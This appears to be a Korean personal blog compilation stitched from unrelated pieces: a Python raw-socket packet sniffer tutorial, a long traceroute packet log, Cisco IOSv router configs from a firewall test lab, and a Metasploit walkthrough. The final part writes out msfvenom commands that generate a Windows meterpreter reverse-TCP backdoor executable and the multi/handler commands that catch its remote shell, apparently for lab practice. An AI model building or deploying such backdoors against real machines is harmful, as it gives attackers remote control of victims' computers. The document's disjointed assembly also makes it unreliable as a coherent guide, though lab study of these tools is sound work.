Python의 raw socket 기능을 활용해 직접 패킷 스니퍼를 socket과 struct 모듈을 이용해 TCP/UDP 패킷을 실시간으로 캡처하고, 간단한 필터링하는 과정입니다

 준비물

• 리눅스 환경 (WSL, Ubuntu 등)
• Python 3.x
• 루트 권한 (sudo)

 요약

• Raw Socket: 운영체제의 네트워크 스택을 우회해, 이더넷 프레임부터 직접 접근할 수 있는 소켓.
• Ethernet Header: MAC 주소와 프로토콜 정보를 담고 있음.
• IP Header: 송수신 IP, 프로토콜(TCP/UDP) 정보 포함.
• TCP/UDP Header: 포트 번호, 시퀀스 번호 등 전송 계층 정보 포함.

 코드 설명

• AF_PACKET: 이더넷 프레임 단위로 수신
• SOCK_RAW: 원시 패킷 수신
• 0x0003: 모든 프로토콜 수신

• 이더넷 헤더는 14바이트
• !6s6sH: 목적지 MAC, 출발지 MAC, 프로토콜

• IP 헤더에서 프로토콜 번호 추출
• 6은 TCP, 17은 UDP

• TCP 헤더에서 포트, 시퀀스, ACK 번호 추출

실행 방법

1. 파일 저장: packet_sniffer.py
2. 실행:

1. 출력 예시:

[IP] From: 192.168.0.10 To: 192.168.0.1 Protocol: 6
[TCP] Src Port: 443 Dst Port: 52344 Seq: 123456 Ack: 654321
[Data] b'GET / HTTP/1.1\r\nHost: example.com\r\n'...

[소스코드]

import socket
import struct

def capture_packets(interface):
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    sock.bind((interface, 0))

    while True:
        packet = sock.recvfrom(65565)[0]

        eth_length = 14
        eth_header = packet[:eth_length]
        eth = struct.unpack('!6s6sH', eth_header)
        eth_protocol = socket.ntohs(eth[2])

        if eth_protocol == 8:  # IP 패킷
            ip_header = packet[eth_length:eth_length+20]
            iph = struct.unpack('!BBHHHBBH4s4s', ip_header)
            version_ihl = iph[0]
            ihl = version_ihl & 0xF
            iph_length = ihl * 4
            protocol = iph[6]
            s_addr = socket.inet_ntoa(iph[8])
            d_addr = socket.inet_ntoa(iph[9])

            print(f'[IP] From: {s_addr} To: {d_addr} Protocol: {protocol}')

            if protocol == 6:  # TCP
                t = eth_length + iph_length
                tcp_header = packet[t:t+20]
                tcph = struct.unpack('!HHLLBBHHH', tcp_header)
                source_port = tcph[0]
                dest_port = tcph[1]
                sequence = tcph[2]
                acknowledgment = tcph[3]
                doff_reserved = tcph[4]
                tcph_length = doff_reserved >> 4

                print(f'[TCP] Src Port: {source_port} Dst Port: {dest_port} Seq: {sequence} Ack: {acknowledgment}')

                h_size = eth_length + iph_length + tcph_length * 4
                data = packet[h_size:]
                print(f'[Data] {data[:64]}...')  # 처음 64바이트만 출력

            elif protocol == 17:  # UDP
                u = eth_length + iph_length
                udp_header = packet[u:u+8]
                udph = struct.unpack('!HHHH', udp_header)
                source_port = udph[0]
                dest_port = udph[1]
                length = udph[2]

                print(f'[UDP] Src Port: {source_port} Dst Port: {dest_port} Length: {length}')

                h_size = eth_length + iph_length + 8
                data = packet[h_size:]
                print(f'[Data] {data[:64]}...')  # 처음 64바이트만 출력

if __name__ == "__main__":
    capture_packets("eth0")  # 실제 사용하는 인터페이스 이름으로 변경

~      

11939.045115 port3 in 192.168.10.100.60455 -> 200.1.1.2.33437: udp 32
11939.045277 port3 in 192.168.10.100.51098 -> 200.1.1.2.33438: udp 32
11939.045312 port3 in 192.168.10.100.48379 -> 200.1.1.2.33439: udp 32
11939.045337 port3 in 192.168.10.100.35204 -> 200.1.1.2.33440: udp 32
11939.045382 port2 out arp who-has 180.1.1.2 tell 180.1.1.1
11939.045434 port3 in 192.168.10.100.47496 -> 200.1.1.2.33441: udp 32
11939.045465 port3 in 192.168.10.100.55245 -> 200.1.1.2.33442: udp 32
11939.045501 port3 in 192.168.10.100.60610 -> 200.1.1.2.33443: udp 32
11939.045518 port3 in 192.168.10.100.42345 -> 200.1.1.2.33444: udp 32
11939.045536 port3 in 192.168.10.100.33374 -> 200.1.1.2.33445: udp 32
11939.045561 port3 in 192.168.10.100.33168 -> 200.1.1.2.33446: udp 32
11939.045576 port3 in 192.168.10.100.56045 -> 200.1.1.2.33447: udp 32
11939.045603 port3 out 170.1.1.1 -> 192.168.10.100: icmp: time exceeded in-transit
11939.045634 port3 out 170.1.1.1 -> 192.168.10.100: icmp: time exceeded in-transit
11939.045636 port3 out 170.1.1.1 -> 192.168.10.100: icmp: time exceeded in-transit
11939.046266 port3 in 192.168.10.100.54057 -> 200.1.1.2.33448: udp 32
11939.046301 port3 in 192.168.10.100.53879 -> 200.1.1.2.33449: udp 32
11939.046328 port3 in 192.168.10.100.58879 -> 200.1.1.2.33450: udp 32
11939.046430 port3 in 192.168.10.100.34079 -> 200.1.1.2.33451: udp 32
11939.046459 port3 in 192.168.10.100.51415 -> 200.1.1.2.33452: udp 32
11939.046487 port3 in 192.168.10.100.49723 -> 200.1.1.2.33453: udp 32
11939.048053 port2 in arp reply 180.1.1.2 is-at 50:0:0:2:0:1
11939.048070 port2 out 180.1.1.1.35204 -> 200.1.1.2.33440: udp 32
11939.048103 port2 out 180.1.1.1.47496 -> 200.1.1.2.33441: udp 32
11939.048117 port2 out 180.1.1.1.55245 -> 200.1.1.2.33442: udp 32
11939.048119 port2 out 180.1.1.1.60610 -> 200.1.1.2.33443: udp 32
11939.048120 port2 out 180.1.1.1.42345 -> 200.1.1.2.33444: udp 32
11939.048121 port2 out 180.1.1.1.33374 -> 200.1.1.2.33445: udp 32
11939.048122 port2 out 180.1.1.1.33168 -> 200.1.1.2.33446: udp 32
11939.048122 port2 out 180.1.1.1.56045 -> 200.1.1.2.33447: udp 32
11939.048123 port2 out 180.1.1.1.54057 -> 200.1.1.2.33448: udp 32
11939.048123 port2 out 180.1.1.1.53879 -> 200.1.1.2.33449: udp 32
11939.048124 port2 out 180.1.1.1.58879 -> 200.1.1.2.33450: udp 32
11939.048124 port2 out 180.1.1.1.34079 -> 200.1.1.2.33451: udp 32
11939.048125 port2 out 180.1.1.1.51415 -> 200.1.1.2.33452: udp 32
11939.048126 port2 out 180.1.1.1.49723 -> 200.1.1.2.33453: udp 32
11939.051136 port2 in 180.1.1.2 -> 180.1.1.1: icmp: time exceeded in-transit
11939.051157 port3 out 180.1.1.2 -> 192.168.10.100: icmp: time exceeded in-transit
11939.051371 port3 in 192.168.10.100.48118 -> 200.1.1.2.33454: udp 32
11939.051404 port2 out 180.1.1.1.48118 -> 200.1.1.2.33454: udp 32
11939.053561 port2 in 180.1.1.2 -> 180.1.1.1: icmp: time exceeded in-transit
11939.053575 port3 out 180.1.1.2 -> 192.168.10.100: icmp: time exceeded in-transit
11939.053974 port3 in 192.168.10.100.41489 -> 200.1.1.2.33455: udp 32
11939.054014 port2 out 180.1.1.1.41489 -> 200.1.1.2.33455: udp 32
11939.055849 port2 in 180.1.1.2 -> 180.1.1.1: icmp: time exceeded in-transit
11939.055858 port3 out 180.1.1.2 -> 192.168.10.100: icmp: time exceeded in-transit
11939.056488 port3 in 192.168.10.100.37531 -> 200.1.1.2.33456: udp 32
11939.056521 port2 out 180.1.1.1.37531 -> 200.1.1.2.33456: udp 32
11939.056556 port3 in 192.168.10.100.49406 -> 200.1.1.2.33457: udp 32
11939.056570 port2 out 180.1.1.1.49406 -> 200.1.1.2.33457: udp 32
11939.056609 port3 in 192.168.10.100.35110 -> 200.1.1.2.33458: udp 32
11939.056627 port2 out 180.1.1.1.35110 -> 200.1.1.2.33458: udp 32
11944.048108 port3 in 192.168.10.100.58961 -> 200.1.1.2.33459: udp 32
11944.048158 port2 out 180.1.1.1.58961 -> 200.1.1.2.33459: udp 32
11944.048194 port3 in 192.168.10.100.41949 -> 200.1.1.2.33460: udp 32
11944.048207 port2 out 180.1.1.1.41949 -> 200.1.1.2.33460: udp 32
11944.048219 port3 in 192.168.10.100.55959 -> 200.1.1.2.33461: udp 32
11944.048252 port2 out 180.1.1.1.55959 -> 200.1.1.2.33461: udp 32
11944.048283 port3 in 192.168.10.100.40707 -> 200.1.1.2.33462: udp 32
11944.048293 port2 out 180.1.1.1.40707 -> 200.1.1.2.33462: udp 32
11944.048303 port3 in 192.168.10.100.54021 -> 200.1.1.2.33463: udp 32
11944.048320 port2 out 180.1.1.1.54021 -> 200.1.1.2.33463: udp 32
11944.048331 port3 in 192.168.10.100.53216 -> 200.1.1.2.33464: udp 32
11944.048338 port2 out 180.1.1.1.53216 -> 200.1.1.2.33464: udp 32
11944.048377 port3 in 192.168.10.100.41455 -> 200.1.1.2.33465: udp 32
11944.048398 port2 out 180.1.1.1.41455 -> 200.1.1.2.33465: udp 32
11944.048429 port3 in 192.168.10.100.52855 -> 200.1.1.2.33466: udp 32
11944.048449 port2 out 180.1.1.1.52855 -> 200.1.1.2.33466: udp 32
11944.048479 port3 in 192.168.10.100.56676 -> 200.1.1.2.33467: udp 32
11944.048529 port2 out 180.1.1.1.56676 -> 200.1.1.2.33467: udp 32
11944.048559 port3 in 192.168.10.100.33484 -> 200.1.1.2.33468: udp 32
11944.048568 port2 out 180.1.1.1.33484 -> 200.1.1.2.33468: udp 32
11944.048580 port3 in 192.168.10.100.58647 -> 200.1.1.2.33469: udp 32
11944.048605 port2 out 180.1.1.1.58647 -> 200.1.1.2.33469: udp 32
11944.050299 port3 out arp who-has 170.1.1.2 tell 170.1.1.1
11944.051642 port3 in 192.168.10.100.49797 -> 200.1.1.2.33470: udp 32
11944.051655 port2 out 180.1.1.1.49797 -> 200.1.1.2.33470: udp 32
11944.054320 port3 in 192.168.10.100.45788 -> 200.1.1.2.33471: udp 32
11944.054390 port2 out 180.1.1.1.45788 -> 200.1.1.2.33471: udp 32
11944.055664 port3 in 192.168.10.100.35648 -> 200.1.1.2.33472: udp 32
11944.055699 port2 out 180.1.1.1.35648 -> 200.1.1.2.33472: udp 32
11944.055732 port3 in 192.168.10.100.38351 -> 200.1.1.2.33473: udp 32
11944.055741 port2 out 180.1.1.1.38351 -> 200.1.1.2.33473: udp 32
11944.058429 port3 in 192.168.10.100.34689 -> 200.1.1.2.33474: udp 32
11944.058445 port2 out 180.1.1.1.34689 -> 200.1.1.2.33474: udp 32
11944.061171 port3 in arp reply 170.1.1.2 is-at 50:0:0:3:0:0
11949.050635 port3 in 192.168.10.100.55854 -> 200.1.1.2.33475: udp 32
11949.050722 port2 out 180.1.1.1.55854 -> 200.1.1.2.33475: udp 32
11949.050759 port3 in 192.168.10.100.56148 -> 200.1.1.2.33476: udp 32
11949.050770 port2 out 180.1.1.1.56148 -> 200.1.1.2.33476: udp 32
11949.050783 port3 in 192.168.10.100.57069 -> 200.1.1.2.33477: udp 32
11949.050794 port2 out 180.1.1.1.57069 -> 200.1.1.2.33477: udp 32
11949.050825 port3 in 192.168.10.100.37029 -> 200.1.1.2.33478: udp 32
11949.050850 port2 out 180.1.1.1.37029 -> 200.1.1.2.33478: udp 32
11949.050873 port3 in 192.168.10.100.35544 -> 200.1.1.2.33479: udp 32
11949.050894 port2 out 180.1.1.1.35544 -> 200.1.1.2.33479: udp 32
11949.050926 port3 in 192.168.10.100.52957 -> 200.1.1.2.33480: udp 32
11949.050937 port2 out 180.1.1.1.52957 -> 200.1.1.2.33480: udp 32
11949.050949 port3 in 192.168.10.100.46882 -> 200.1.1.2.33481: udp 32
11949.050965 port2 out 180.1.1.1.46882 -> 200.1.1.2.33481: udp 32
11949.050996 port3 in 192.168.10.100.60171 -> 200.1.1.2.33482: udp 32
11949.051017 port2 out 180.1.1.1.60171 -> 200.1.1.2.33482: udp 32
11949.051051 port3 in 192.168.10.100.41857 -> 200.1.1.2.33483: udp 32
11949.051060 port2 out 180.1.1.1.41857 -> 200.1.1.2.33483: udp 32
11949.051092 port3 in 192.168.10.100.54990 -> 200.1.1.2.33484: udp 32
11949.051100 port2 out 180.1.1.1.54990 -> 200.1.1.2.33484: udp 32
11949.051149 port3 in 192.168.10.100.50099 -> 200.1.1.2.33485: udp 32
11949.051170 port2 out 180.1.1.1.50099 -> 200.1.1.2.33485: udp 32
11949.052568 port3 in 192.168.10.100.55273 -> 200.1.1.2.33486: udp 32
11949.052582 port2 out 180.1.1.1.55273 -> 200.1.1.2.33486: udp 32
11949.055280 port3 in 192.168.10.100.55555 -> 200.1.1.2.33487: udp 32
11949.055337 port2 out 180.1.1.1.55555 -> 200.1.1.2.33487: udp 32
11949.056710 port3 in 192.168.10.100.39481 -> 200.1.1.2.33488: udp 32
11949.056736 port2 out 180.1.1.1.39481 -> 200.1.1.2.33488: udp 32
11949.056771 port3 in 192.168.10.100.49641 -> 200.1.1.2.33489: udp 32
11949.056790 port2 out 180.1.1.1.49641 -> 200.1.1.2.33489: udp 32
11949.058943 port3 in 192.168.10.100.34929 -> 200.1.1.2.33490: udp 32
11949.058970 port2 out 180.1.1.1.34929 -> 200.1.1.2.33490: udp 32
11954.055631 port3 in 192.168.10.100.56237 -> 200.1.1.2.33491: udp 32
11954.055667 port2 out 180.1.1.1.56237 -> 200.1.1.2.33491: udp 32
11954.055694 port3 in 192.168.10.100.54246 -> 200.1.1.2.33492: udp 32
11954.055702 port2 out 180.1.1.1.54246 -> 200.1.1.2.33492: udp 32
11954.056049 port3 in 192.168.10.100.57523 -> 200.1.1.2.33493: udp 32
11954.056061 port2 out 180.1.1.1.57523 -> 200.1.1.2.33493: udp 32
11954.056082 port3 in 192.168.10.100.59586 -> 200.1.1.2.33494: udp 32
11954.056090 port2 out 180.1.1.1.59586 -> 200.1.1.2.33494: udp 32
11954.056109 port3 in 192.168.10.100.57265 -> 200.1.1.2.33495: udp 32
11954.056128 port2 out 180.1.1.1.57265 -> 200.1.1.2.33495: udp 32
11954.056148 port3 in 192.168.10.100.44725 -> 200.1.1.2.33496: udp 32
11954.056155 port2 out 180.1.1.1.44725 -> 200.1.1.2.33496: udp 32
11954.056167 port3 in 192.168.10.100.44039 -> 200.1.1.2.33497: udp 32
11954.056173 port2 out 180.1.1.1.44039 -> 200.1.1.2.33497: udp 32
11954.056182 port3 in 192.168.10.100.60998 -> 200.1.1.2.33498: udp 32
11954.056201 port2 out 180.1.1.1.60998 -> 200.1.1.2.33498: udp 32
11954.056232 port3 in 192.168.10.100.44563 -> 200.1.1.2.33499: udp 32
11954.056241 port2 out 180.1.1.1.44563 -> 200.1.1.2.33499: udp 32
11954.056251 port3 in 192.168.10.100.52073 -> 200.1.1.2.33500: udp 32
11954.056269 port2 out 180.1.1.1.52073 -> 200.1.1.2.33500: udp 32
11954.056289 port3 in 192.168.10.100.34529 -> 200.1.1.2.33501: udp 32
11954.056306 port2 out 180.1.1.1.34529 -> 200.1.1.2.33501: udp 32
11954.056326 port3 in 192.168.10.100.38130 -> 200.1.1.2.33502: udp 32
11954.056345 port2 out 180.1.1.1.38130 -> 200.1.1.2.33502: udp 32
11954.056375 port3 in 192.168.10.100.33234 -> 200.1.1.2.33503: udp 32
11954.056425 port2 out 180.1.1.1.33234 -> 200.1.1.2.33503: udp 32
11954.058550 port3 in 192.168.10.100.60814 -> 200.1.1.2.33504: udp 32
11954.058563 port2 out 180.1.1.1.60814 -> 200.1.1.2.33504: udp 32
11954.058612 port3 in 192.168.10.100.45704 -> 200.1.1.2.33505: udp 32
11954.058623 port2 out 180.1.1.1.45704 -> 200.1.1.2.33505: udp 32
11954.060015 port3 in 192.168.10.100.52708 -> 200.1.1.2.33506: udp 32
11954.060031 port2 out 180.1.1.1.52708 -> 200.1.1.2.33506: udp 32
11959.062425 port3 in 192.168.10.100.60903 -> 200.1.1.2.33507: udp 32
11959.062487 port2 out 180.1.1.1.60903 -> 200.1.1.2.33507: udp 32
11959.062512 port3 in 192.168.10.100.38006 -> 200.1.1.2.33508: udp 32
11959.062520 port2 out 180.1.1.1.38006 -> 200.1.1.2.33508: udp 32
11959.062531 port3 in 192.168.10.100.54241 -> 200.1.1.2.33509: udp 32
11959.062536 port2 out 180.1.1.1.54241 -> 200.1.1.2.33509: udp 32
11959.062591 port3 in 192.168.10.100.45598 -> 200.1.1.2.33510: udp 32
11959.062624 port2 out 180.1.1.1.45598 -> 200.1.1.2.33510: udp 32
11959.062665 port3 in 192.168.10.100.33583 -> 200.1.1.2.33511: udp 32
11959.062675 port2 out 180.1.1.1.33583 -> 200.1.1.2.33511: udp 32
11959.062706 port3 in 192.168.10.100.53161 -> 200.1.1.2.33512: udp 32
11959.062715 port2 out 180.1.1.1.53161 -> 200.1.1.2.33512: udp 32
11959.062753 port3 in 192.168.10.100.48440 -> 200.1.1.2.33513: udp 32
11959.062762 port2 out 180.1.1.1.48440 -> 200.1.1.2.33513: udp 32
11959.062773 port3 in 192.168.10.100.37079 -> 200.1.1.2.33514: udp 32
11959.062777 port2 out 180.1.1.1.37079 -> 200.1.1.2.33514: udp 32
11959.062808 port3 in 192.168.10.100.36212 -> 200.1.1.2.33515: udp 32
11959.062829 port2 out 180.1.1.1.36212 -> 200.1.1.2.33515: udp 32
11959.062866 port3 in 192.168.10.100.50254 -> 200.1.1.2.33516: udp 32
11959.062874 port2 out 180.1.1.1.50254 -> 200.1.1.2.33516: udp 32
11959.062914 port3 in 192.168.10.100.56743 -> 200.1.1.2.33517: udp 32
11959.062940 port2 out 180.1.1.1.56743 -> 200.1.1.2.33517: udp 32
11959.062973 port3 in 192.168.10.100.46998 -> 200.1.1.2.33518: udp 32
11959.062991 port2 out 180.1.1.1.46998 -> 200.1.1.2.33518: udp 32
11959.063004 port3 in 192.168.10.100.59546 -> 200.1.1.2.33519: udp 32
11959.063052 port2 out 180.1.1.1.59546 -> 200.1.1.2.33519: udp 32
11959.063083 port3 in 192.168.10.100.45005 -> 200.1.1.2.33520: udp 32
11959.063103 port2 out 180.1.1.1.45005 -> 200.1.1.2.33520: udp 32
11959.063135 port3 in 192.168.10.100.49054 -> 200.1.1.2.33521: udp 32
11959.063143 port2 out 180.1.1.1.49054 -> 200.1.1.2.33521: udp 32
11959.063155 port3 in 192.168.10.100.38388 -> 200.1.1.2.33522: udp 32
11959.063174 port2 out 180.1.1.1.38388 -> 200.1.1.2.33522: udp 32
11964.068599 port3 in 192.168.10.100.34797 -> 200.1.1.2.33523: udp 32
11964.068636 port2 out 180.1.1.1.34797 -> 200.1.1.2.33523: udp 32
11974.010136 port2 out arp who-has 180.1.1.2 tell 180.1.1.1
11974.012237 port2 in arp reply 180.1.1.2 is-at 50:0:0:2:0:1
12003.992146 port1 in 192.168.199.1.138 -> 192.168.199.255.138: udp 201

약간 미제...........

1) Client 

- 출발지 역할의 단말 PC

2) iL3 

- 방화벽 기준 내부에 있는 라우터 

iL3#show run
Building configuration...

Current configuration : 3175 bytes
!
! Last configuration change at 07:00:30 UTC Sun Aug 21 2022
!
version 15.2
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
service compress-config
!
hostname iL3
!
boot-start-marker
boot-end-marker
!
no aaa new-model
!
ip cef
no ipv6 cef
!
spanning-tree mode pvst
spanning-tree extend system-id
!
vlan internal allocation policy ascending
!
interface GigabitEthernet0/0
 no switchport
 ip address 170.1.1.2 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/1
 no switchport
 ip address 192.168.10.254 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet0/3
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/0
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/1
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/3
 media-type rj45
 negotiation auto
!
ip forward-protocol nd
!
no ip http server
no ip http secure-server
!
ip route 180.1.1.0 255.255.255.0 170.1.1.1
ip route 192.168.1.0 255.255.255.0 170.1.1.1
ip route 200.1.1.0 255.255.255.0 170.1.1.1
!
control-plane
!
banner exec ^C
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner incoming ^C
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner login ^C
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
!
line con 0
line aux 0
line vty 0 4
!
end

3) Firewall

- 패킷의 허용 여부를 정책으로 지정할 수 있는 장비

4) eL3

- 방화벽 기준 외부에 있는 라우터

eL3#show run
Building configuration...

Current configuration : 3185 bytes
!
! Last configuration change at 06:45:31 UTC Sun Aug 21 2022
!
version 15.2
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
service compress-config
!
hostname eL3
!
boot-start-marker
boot-end-marker
!
no aaa new-model
!
ip cef
no ipv6 cef
!
spanning-tree mode pvst
spanning-tree extend system-id
!
vlan internal allocation policy ascending
!
interface GigabitEthernet0/0
 no switchport
 ip address 200.1.1.254 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/1
 no switchport
 ip address 180.1.1.2 255.255.255.0
 negotiation auto
!
interface GigabitEthernet0/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet0/3
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/0
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/1
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/2
 media-type rj45
 negotiation auto
!
interface GigabitEthernet1/3
 media-type rj45
 negotiation auto
!
ip forward-protocol nd
!
no ip http server
no ip http secure-server
!
ip route 170.1.1.0 255.255.255.0 180.1.1.1
ip route 192.168.1.0 255.255.255.0 180.1.1.1
ip route 192.168.10.0 255.255.255.0 180.1.1.1
!
control-plane
!
banner exec ^CC
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner incoming ^CC
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
banner login ^CC
**************************************************************************
* IOSv is strictly limited to use for evaluation, demonstration and IOS  *
* education. IOSv is provided as-is and is not supported by Cisco's      *
* Technical Advisory Center. Any use or disclosure, in whole or in part, *
* of the IOSv Software or Documentation to any third party for any       *
* purposes is expressly prohibited except as otherwise authorized by     *
* Cisco in writing.                                                      *
**************************************************************************^C
!
line con 0
line aux 0
line vty 0 4
 login
!
end

5) Server

-  목적지 역할의 단말 PC

서버도 있고, 방화벽도 있고, L3 스위치도 있다. 테스트 환경은 완성했으니, 테스트만 하면 된다.

리눅스에서 metasploit 파일을 구해서 설치한다. 

설치 명령어 : dpkg -i metasploit*

msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe

백도어 파일을 생성해준다음에 msf콘솔을 실행해준다

-l  을 이용해 페이로드 종류를 확인 해볼 수 있다

msfconsole 명령어를 통해 콘솔을 실행한다 

핸들러 정의를 해주고 세션을 확인해보면 현재는 연결된 세션이 없는 것을 확인할 수 있다

이제 테스트 할 윈도우에서 조금 전에 만들어준 백도어 파일을 실행하면 ~

세션이 연결 된 것을 확인 할 수 있다. mkdir Test 라고 입력하면 ~~~

폴더가 생성 된 것을 확인 할 수 있다.

백도어 (Backdoor)

msfvenom설치

metasploit-framework_4.16.16+20171109102928.git.1.c5fd027_1rapid7-1_i386(32bit) 

파일구해서 dpkg -i 로 설치하면됨 (https://apt.metasploit.com/)

msfvenom -l  페일로드 종류확인

msfvenom -p windows/meterpreter/reverse_tcp lhost=자신IP lport=쓸포트 -f(파일네임 약자) exe > /backup/windows.exe(저장경로)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.12 lport=4444 -f exe > /backup/windows.exe

msfconsole  콘솔실행

use exploit/multi/handler  핸들러테이블 불러오는

set payload windows/meterpreter/reverse_tcp  만든 페이로드와 똑같게

set lhost 192.168.0.12     자신의 IP

set lport 4444             사용할 포트

set exitonsession false    세션을 백그라운드 동작 (해커의)

exploit -j                 핸들러 실행

sessions                   세션 View (연결된 세션 보기)

sessions -i 1              세션과 연결시키기 (세션에서 번호확인하고)

이제 help 쳐보면 할수 있는 커맨드들이 나옴 

예) shutdown (윈도우가 꺼진다)